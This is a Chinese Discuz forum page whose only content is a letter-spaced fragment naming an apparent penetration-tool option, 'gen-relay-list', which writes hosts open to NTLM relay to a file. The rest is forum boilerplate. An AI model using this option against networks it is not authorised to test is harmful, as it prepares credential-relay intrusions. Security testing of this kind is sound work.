g e n - r e l a y - l i s t   r e l a y l i s t O u t p u t F i l e n a m e . t x t
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理